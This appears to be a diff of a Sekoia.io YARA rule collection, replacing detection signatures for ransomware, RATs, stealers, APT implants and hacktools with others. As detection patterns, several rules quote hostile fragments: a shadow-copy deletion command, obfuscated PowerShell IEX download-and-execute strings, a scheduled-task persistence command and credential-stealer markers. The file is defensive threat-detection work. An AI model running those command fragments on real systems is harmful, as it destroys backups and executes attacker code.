-		date = "2023-12-05"
+		id = "6c9b0225-8c41-49f9-9745-245bc7ef942f"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_mimilite.yar#L1-L37"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_earthworm_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "504bc58e1c4143cc2322d564b637b0e014a4ead44f56a75fe1202b0d0a2e8bbc"
+		logic_hash = "0460c62fefc3d594ca758a37fbe1716182ffdca2920fedd32a707f7117702176"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257892,43 +258064,26 @@ rule SEKOIA_Hacktool_Mimilite : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk = {
-        FF C7
-        48 63 D7
-        46 0F B6 04 22
-        41 03 F0
-        81 E6 ?? ?? ?? ??
-        7D ??
-        FF CE
-        81 CE ?? ?? ?? ??
-        FF C6
-        48 63 CE
-        42 0F B6 04 21
-        42 88 04 22
-        46 88 04 21 }
-		$imp1 = "CryptGetHashParam"
-		$imp2 = "CryptDestroyHash"
-		$imp3 = "CryptHashData"
-		$imp4 = "CryptReleaseContext"
-		$imp5 = "CryptCreateHash"
-		$imp6 = "CryptAcquireContextA"
-		$imp7 = "VirtualAlloc"
+		$ = "the read url is %s"
+		$ = "--> %3d <-- (close)used tunnel %d , unused tunnel %d"
+		$ = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server"
+		$ = "could not create one way tunnel"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $imp* ) and $chunk
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcffaedfe ) and filesize < 100KB and 3 of them
 }
-rule SEKOIA_Ransomware_Win_Agenda : FILE
+rule SEKOIA_Hacktool_Microsocks_Strings : FILE
 {
 	meta:
-		description = "Finds Agenda ransomware (aka Qilin) samples based on characteristic strings"
+		description = "Detects Microsocks"
 		author = "Sekoia.io"
-		id = "b0ea8e69-8f29-452f-95f7-67ee0e545b66"
-		date = "2022-12-15"
+		id = "20e82008-249b-47a3-885b-7c4b04b31a57"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_agenda.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_microsocks_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7e315f639c4d785639bf7ed3bd805551366b4da10a664a42bf801c54c6f7bd2d"
+		logic_hash = "b76b66fbdd9a7e2ea8adb68781d6b14c18189a8b330a61c2a65e7394ef8024c3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257936,223 +258091,185 @@ rule SEKOIA_Ransomware_Win_Agenda : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "\"note\": \"-- Qilin" ascii
-		$str01 = "README-RECOVER-.txt" ascii
-		$str02 = "\"file_black_list\": [" ascii
-		$str03 = "\"file_pattern_black_list\": [" ascii
-		$str04 = "Encrypted files have new extension." ascii
-		$str05 = "We have downloaded compromising and sensitive data from you system/network" ascii
-		$str06 = "Employees personal dataCVsDLSSN." ascii
-		$str07 = "ueegj65kwr3v3sjhli73gjtmfnh2uqlte3vyg2kkyqq7cja2yx2ptaad.onion" ascii
-		$str08 = "cmdvssadmin.exe delete shadows /all /quiet" ascii
-		$str09 = "[WARNING] Removing shadows failed." ascii
-		$str10 = "[INFO] Shadow copies removed" ascii
-		$str11 = "[WARNING] net sahre enum failed with:" ascii
+		$ = "microsocks -1 -i listenip -p port -u user -P password"
+		$ = "user/pass, it is added to a whitelist"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Scanline_Strings : FILE
+rule SEKOIA_Trojan_Win_Bbtok_Iso_Sep23 : FILE
 {
 	meta:
-		description = "Detects scanline (non-packed)"
+		description = "Finds BBTok installation ISO file"
 		author = "Sekoia.io"
-		id = "65677b81-d077-4d01-8398-cbb06ce49edf"
-		date = "2024-09-06"
+		id = "6032853d-b872-4b2e-913d-366e7f3d0f32"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_scanline_strings.yar#L1-L18"
+		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_bbtok_iso_sep23.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e02ae30451aa5eaffb588e92ecc221bf6ed07097bc493c6a55cf688da8b76151"
+		hash = "140e83d2e0d012cdd5625ea89c3b3af05a80877cfc8215bbe20823e7e88c80b1"
+		logic_hash = "efef1e4e50d84cd30c025c86beb751c73a996cca896f90729571f48259ffc110"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Resolve IP addresses to hostnames"
-		$ = "Randomize IP and port scan order"
-		$ = "?bhijnprsT"
-		$ = "sl -bht"
+		$iso = {43 44 30 30 31}
+		$str01 = "POWERISO" ascii
+		$str02 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
+		$str03 = ".pdf /Y & start" wide
+		$str04 = "\\MSBuild.exe -nologo \\\\" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		all of them and filesize < 500KB
 }
-rule SEKOIA_Infostealer_Win_Whitesnake_Xor_Rc4_July12 : FILE
+
+rule SEKOIA_Wiper_Win_Dnwipe : FILE
 {
 	meta:
-		description = "Detects WhiteSnake Stealer XOR and RC4 version"
+		description = "Detect the dnWipe malware"
 		author = "Sekoia.io"
-		id = "f2ebfcbd-9667-459a-a543-ce0be62c0dc4"
-		date = "2023-07-12"
+		id = "522fdaa5-8fe6-4e37-aaf8-13e3a7787d21"
+		date = "2022-11-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_whitesnake_xor_rc4_july12.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_dnwipe.yar#L4-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f14b95e5cb6ffaab14d0890847fe6e9dcfc3ee0b884c34d24d786420e2411a80"
+		logic_hash = "634ca80a168c9d98ce87a3a1a451769bddb7ae27e28b3682693b34ccce2c7ad4"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
-		$2 = {61 6e 61 6c 2e 6a 70 67}
-		$3 = {73 68 69 74 2e 6a 70 67}
-		$4 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C}
-		$5 = "qemu" wide
-		$6 = "vbox" wide
+		$ = "dnWIPE"
+		$ = "dnWIPE" wide
+		$ = "C:\\Users\\Admin1\\source\\repos\\dnWIPE\\dnWIPE\\obj\\Debug\\dnWIPE.pdb"
 
 	condition:
-		($1 and $2 and filesize < 600KB ) or ( $3 and $4 and $5 and $6 and filesize < 300KB )
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 50KB or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "93290ef6447b0a16b92e50a1652ac3eb8f1237cc5f8005e080750fb58c19d230" )
 }
-
-rule SEKOIA_Backdoor_Win_Headertip : FILE
+rule SEKOIA_Apt_Gamaredon_Lnks_Farl139_Hostname : FILE
 {
 	meta:
-		description = "Detect HeaderTip backdoor used by the Chinese threat actor Scarab. This backdoor has its hardcoded C2 in strings"
+		description = "Detects some hostname used in Gamaredon LNKs"
 		author = "Sekoia.io"
-		id = "82899406-4ec3-41d2-bcc1-bdd1ee440e77"
-		date = "2022-03-25"
+		id = "f8bb2e6b-e544-46b0-b61b-048fe84e1100"
+		date = "2023-01-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_headertip.yar#L4-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_lnks_farl139_hostname.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "289764df590cd2719d4d4e0dd66f7d8ebb4714d42eea4bb76c47a2b867a113de"
+		logic_hash = "8be31a4fed363f0e2791efb96a229f6cdec5bfaeaf3e9cd880f8d25c9ae0435e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e1523185eac41a615b8d2af8b7fd5fe07b755442df2836041be544dff6881237"
-		hash2 = "da8a98d9b9a3c176ba44fb69ad0a820a971950e05f1eb0c4bbbf6c2fbb748bdc"
-		hash3 = "63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1"
 
 	strings:
-		$post = "POST" wide
-		$ua = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide
+		$ = "desktop-farl139"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and $post at 7256 and $ua at 7304 and filesize < 10KB ) or pe.imphash ( ) == "60d01115d6baa0f214990c6e19339133" or hash.md5 ( pe.rich_signature.clear_data ) == "48f9cf422144c033e2ca183f72587910"
+		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Apt33_Falsefont : FILE
+rule SEKOIA_Apt_Toddycat_Tomberbil_Strings : FILE
 {
 	meta:
-		description = "FalseFont backdoor"
+		description = "Detects TomBerBil password stealer"
 		author = "Sekoia.io"
-		id = "d77c1f5b-9898-456f-954a-ac1f0907a2ba"
-		date = "2024-03-25"
+		id = "b16f4d35-ea59-4439-8ddb-2c0415b97b9b"
+		date = "2024-04-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt33_falsefont.yar#L1-L38"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toddycat_tomberbil_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2eafe15d8e0df1b63b32463c4b44a9dc1d4251d01c15be20e4285c31e75b8348"
+		logic_hash = "92da6ba86cffec75a9af90a513840672b023c81baa9aedb2b706534cc39ecc09"
 		score = 75
-		quality = 53
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "Agent.Core.WPF"
-		$s1 = "data2.txt" wide fullword
-		$s2 = "data.txt" wide fullword
-		$s3 = "Loginvault.db" wide fullword
-		$command1 = "ExecUseShell" ascii
-		$command2 = "ExecAndKeepAlive" ascii
-		$command3 = "CMD" ascii
-		$command4 = "PowerShell" ascii
-		$command5 = "KillByName" ascii
-		$command6 = "KillById" ascii
-		$command7 = "Download" ascii
-		$command8 = "Upload" ascii
-		$command9 = "Delete" ascii
-		$command10 = "GetDirectories" ascii
-		$command11 = "ChangeTime" ascii
-		$command12 = "SendAllDirectory" ascii
-		$command13 = "UpadateApplication" ascii
-		$command14 = "Restart" ascii
-		$command15 = "GetProcess" ascii
-		$command16 = "SendAllDirectoryWithStartPath" ascii
-		$command17 = "GetDir" ascii
-		$command18 = "GetHard" ascii
-		$command19 = "GetScreen" ascii
-		$command20 = "StopSendScreen" ascii
+		$ = "[+] Begin" ascii wide
+		$ = "[+] Delete File" ascii wide
+		$ = "[+] Current user" ascii wide
+		$ = "[+] Impersonate user" ascii wide
+		$ = "[+] Local State File" ascii wide
+		$ = "[>] Profile" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 15 of ( $command* ) and 3 of ( $s* )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Apt_Kimsuky_Toddlershark_Obfuscated : FILE
+rule SEKOIA_Pe_Princeransomware_Strings : FILE
 {
 	meta:
-		description = "Detects obfuscated version of Kimsuky TODDLERSHARK vbs malware"
+		description = "Prince Ransomware exe files"
 		author = "Sekoia.io"
-		id = "9ab82466-4f38-4597-b75b-13252e180c70"
-		date = "2024-03-06"
+		id = "9c5cad6e-2b11-469c-ace1-2dc51562b035"
+		date = "2024-08-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_toddlershark_obfuscated.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/pe_princeransomware_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5f067ce32e7fee5cf481d82bb98f4ae10bd7187078bc111b08fc58d043954152"
+		hash = "8bd8de169f45e32bab53f6e06088836d6f0526105f03efa1faf84f3b02c43011"
+		hash = "a83aad6861c8fdfe2392b8e286ab7051d223c6b0bbba5996165964f429657a37"
+		logic_hash = "18577c5673b4fc5280dee88aefac3747c254a97fdc84b584af241277361f6400"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 3a 20 [3-10] 20 3d 20 22 [3-30] 22 3a }
-		$s2 = { 45 78 65 63 75 74 65 28  [3-15] 28 22 }
-		$s3 = { 50 72 69 76 61 74 65 20 46 75 6e 63 74 69 6f 6e 20 [3-15] 28 42 79 56 61 6c 20 [3-15] 29 3a }
-		$s4 = "& Chr(\"&H\" & Mid("
+		$ = "https://i.imgur.com/RfsCOES.png" ascii
+		$ = {596f75722066696c65732068617665206265656e20656e63727970746564207573696e67205072696e63652052616e736f6d77617265}
 
 	condition:
-		#s4== 1 and #s3 == 1 and #s2 == 1 and #s1 > 20 and filesize < 1MB
+		all of them and uint16( 0 ) == 0x5a4d and filesize > 1MB
 }
-rule SEKOIA_Apt_Apt_K_47_Orpcbackdoor : FILE
+rule SEKOIA_Rat_Win_Atharvan
 {
 	meta:
-		description = "Detects ORPCBackdoor used by APT-K-47"
+		description = "Detect Atharvan RAT"
 		author = "Sekoia.io"
-		id = "9768371d-763f-45df-b727-ccda97501aaa"
-		date = "2024-02-14"
+		id = "61347490-d281-4892-adba-89cf6187545f"
+		date = "2023-02-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt_k_47_orpcbackdoor.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_atharvan.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4a05e68eca0954e3bca5ebec6c63bf0535051f8d99f65940b7ed00f49e659f2d"
+		logic_hash = "fee9a5a684b3e9bd629a0e87bdf63ba0c1fc1e970ca3b7fec8d7a4f2f60a355a"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 78
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RegisteredOrganization:\t\t\t" ascii wide
-		$s2 = "To Be Filled By O.E.M" ascii wide
-		$s3 = ">> "
-		$s4 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%u" wide
-		$s5 = "Error! GetSystemDirectory failed."
-		$s6 = "Domain:\t\t\t\t"
+		$s1 = {44 3a 5c 72 61 6e 67 5c 54 4f 4f 4c 5c 33 52 41 54}
 
 	condition:
-		all of them and filesize < 300KB and uint16be( 0 ) == 0x4d5a
+		all of them
 }
-rule SEKOIA_Hacktool_Win_Cookiekatz : FILE
+rule SEKOIA_Apt_Aptk47_Maliciouslnk : FILE
 {
 	meta:
-		description = "Finds ChromeKatz (CookieKatz version) standalone samples based on the strings"
+		description = "Detects APT-K-47 malicious LNK"
 		author = "Sekoia.io"
-		id = "a32769bb-4ec4-46c7-9402-21afdf8d4293"
-		date = "2024-10-30"
+		id = "2ccc8777-26fe-4018-9646-4ea91394fe78"
+		date = "2024-11-22"
 		modified = "2024-12-19"
-		reference = "https://github.com/Meckazin/ChromeKatz"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_cookiekatz.yar#L1-L36"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptk47_maliciouslnk.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "fef9fc33a788489af44b2f732c450d4ef018fbaced7f5471230b282dfd6f1169"
-		logic_hash = "a030f551d0f3dedf0f19e22b415aa87dd1c43ab2242db8b5cad14ae6b7695b3a"
+		hash = "6a405d4e88b4acb9706e19a83aad9cf6"
+		logic_hash = "865bb08f57affb3795853aa3c9f49577efb74df9b32e7760263b9fb08246a3ab"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258160,43 +258277,25 @@ rule SEKOIA_Hacktool_Win_Cookiekatz : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "CookieKatz.exe" ascii
-		$str02 = "--utility-sub-type=network.mojom.NetworkService" wide
-		$str03 = "chrome.dll" wide
-		$str04 = "msedge.dll" wide
-		$str05 = "msedgewebview2.exe" wide
-		$str06 = "Failed to read cookie struct" wide
-		$str07 = "Failed to read the root node from given address" wide
-		$str08 = "Error reading left node" wide
-		$str09 = "By Meckazin" ascii
-		$str10 = "By default targets first available Chrome process" ascii
-		$str11 = "Kittens love cookies too!" ascii
-		$str12 = "Attempting to read the cookie value from address: 0x%p" ascii
-		$str13 = "szCookieMonster" ascii
-		$str14 = "[*] Targeting Chrome" ascii
-		$str15 = "[*] Targeting Edge" ascii
-		$str16 = "[*] This Cookie map was empty" ascii
-		$str17 = "[+] Found browser process: %d" ascii wide
-		$str18 = "[*] Targeting process PID: %d" wide
-		$str19 = "[*] Found CookieMonster on 0x%p" wide
-		$str20 = "[*] CookieMap should be found in address 0x%p" wide
+		$ = "[/c for /f" wide
+		$ = "2^>nul') do copy" wide
+		$ = "%F in ('where /r %Temp%" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Lnk_Spreader : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Strings : FILE
 {
 	meta:
-		description = "Detects LNK generated by Gamaredon LNK spreader"
+		description = "Detects XDealer based on strings"
 		author = "Sekoia.io"
-		id = "2866ca1d-c094-49ba-b1de-ff9a60680e28"
-		date = "2023-06-19"
+		id = "06ef72ca-b4e3-493b-8e01-d34b98259c6d"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_lnk_spreader.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a"
-		logic_hash = "e8a82fd4cdce7bc888184ccf8d182ab5bb53e30de04b02b7c63379bae5d21b1f"
+		logic_hash = "13c0bbc933f68164b0fe1c2768148bb649b1755bed0cfbc6ed90188fab6876d5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258204,24 +258303,29 @@ rule SEKOIA_Apt_Gamaredon_Lnk_Spreader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "windoWSTYLE hiDdEn -NOlOgo iEX" wide nocase
-		$ = "(IeX (geT-coNtEnT" wide nocase
+		$ = "unknow_PC"
+		$ = "rdp-tcp#"
+		$ = "Din_%s_%s_%u_"
+		$ = "nslookup %s %s"
+		$ = "XFByb2dyYW1EYXRhXA=="
 
 	condition:
-		uint32be( 0 ) == 0x4C000000 and filesize < 3KB and all of them
+		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 1MB
 }
-rule SEKOIA_Hacktool_Mimikat_Ssp_Strings : FILE
+rule SEKOIA_Apt_Apt28_Ukrnet_Phishing_Page : FILE
 {
 	meta:
-		description = "Detects mimikat_ssp"
+		description = "Detects APT28 Phishing page"
 		author = "Sekoia.io"
-		id = "33b3620f-e02d-4d29-adcc-fea3b49ab780"
-		date = "2023-11-22"
+		id = "053158d8-aac0-486f-8432-834a06f41ed2"
+		date = "2024-09-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_mimikat_ssp_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_ukrnet_phishing_page.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "06325bf495963db90b14fb16a5f3eafda9e4554f753d04405af51c6041a9b166"
+		hash = "20dc3a5beb8e3a7801e010b4113efef1"
+		hash = "5f1462144d7704101cd71c679ea0322b"
+		logic_hash = "3d077a7ce35094bcbda763c131d4564ffbcea0373f5cbd30406ada4e9db36529"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258229,51 +258333,59 @@ rule SEKOIA_Hacktool_Mimikat_Ssp_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[*] Building RPC packet" ascii
-		$ = "[*] Connecting to lsasspirpc RPC service" ascii
-		$ = "[*] Sending SspirConnectRpc call" ascii
-		$ = "[*] Sending SspirCallRpc call" ascii
+		$ = "baseurl+\"/captcha\""
+		$ = "(\"sessionID\", sessionID"
+		$ = ".responseJSON['origin"
+		$ = "var baseurl="
+		$ = "(req.responseText.includes("
+		$ = "else if (req.responseText=='FAIL')"
+		$ = "|| document.getElementById('confpwd"
+		$ = "/master/dist/text-security-disc.woff"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		4 of them and filesize < 500KB
 }
-rule SEKOIA_Backdoor_Powershellempire_Gen : FILE
+rule SEKOIA_Exploit_Linux_Eop_Ubuntu_Overlayfs_Local_Privesc_Strings : FILE
 {
 	meta:
-		description = "Detects EmpirePowershell"
+		description = "Detects Ubuntu OverlayFS Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "36050a5b-bdca-45cd-8e26-7129fdcbf1e8"
-		date = "2022-04-15"
+		id = "5e0e73f5-4cb3-4a79-adac-578b17ed7660"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_gen.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_ubuntu_overlayfs_local_privesc_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "21f255bcfb6da2aa996ed61ff5fb29a9355de6169095f7c3141a1b7f3cea5c2d"
+		logic_hash = "48ff9d2a10eef1e9b9088ba4a53aa77f43324e5d51da65b65a5829276067f011"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;" nocase wide ascii
-		$ = "($IV+$K))|IEX" nocase wide ascii
+		$ = "./ovlcap"
+		$ = "rm -rf '%s/'"
+		$ = "./ovlcap/work"
+		$ = "./ovlcap/lower"
+		$ = "./ovlcap/upper"
+		$ = "./ovlcap/merge"
 
 	condition:
-		all of them and filesize < 1MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Rat_Win_Asyncrat : FILE
+rule SEKOIA_Infostealer_Win_Mars_Stealer_Variant_Llcppc1 : FILE
 {
 	meta:
-		description = "Detect AsyncRAT based on specific strings"
+		description = "Detect Mars Stealer variand llcppc1"
 		author = "Sekoia.io"
-		id = "d698e4a1-77ff-4cd7-acb3-27fb16168ceb"
-		date = "2023-01-25"
+		id = "3e2c7440b2fc9e4b039e6fa8152ac8fe"
+		date = "2022-03-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_asyncrat.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_mars_stealer_variant_llcppc1.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5e35b034ba1761fae780429be377b70ae8ce62273670042ff067c38ed8bb5a9e"
+		logic_hash = "f9d92338fa31c38648b72d7f9a953201c7e498237bc9d02d6247d1882d1e3432"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258281,70 +258393,64 @@ rule SEKOIA_Rat_Win_Asyncrat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "get_ActivatePong" ascii
-		$str02 = "get_SslClient" ascii
-		$str03 = "get_TcpClient" ascii
-		$str04 = "get_SendSync" ascii
-		$str05 = "get_IsConnected" ascii
-		$str06 = "set_UseShellExecute" ascii
-		$str07 = "Pastebin" wide
-		$str08 = "Select * from AntivirusProduct" wide
-		$str09 = "Stub.exe" wide
-		$str10 = "timeout 3 > NUL" wide
-		$str11 = "/c schtasks /create /f /sc onlogon /rl highest /tn " wide
-		$str12 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
+		$a = {ff 15 ?? ?? ?? ?? 89 45 ?? 6a 14 68 ?? ?? ?? ?? ff 75 ?? e8 23 00 00 00 ff 75 ?? ff 75 ?? ff 75 ?? e8 5c 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of them
+		uint16( 0 ) == 0x5A4D and $a
 }
-rule SEKOIA_Infostealer_Win_Enigma_Stealer_Module : FILE
+rule SEKOIA_Apt_Muddywater_Rotrot_Strings : FILE
 {
 	meta:
-		description = "Find stealer module of Enigma Stealer based on specific strings"
+		description = "Detects RotRot backdoor based on strings"
 		author = "Sekoia.io"
-		id = "664fe8de-b406-4d63-9a4b-1c350b444f02"
-		date = "2023-01-30"
+		id = "f7bc195a-0e60-4495-b78a-78f101543700"
+		date = "2024-06-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
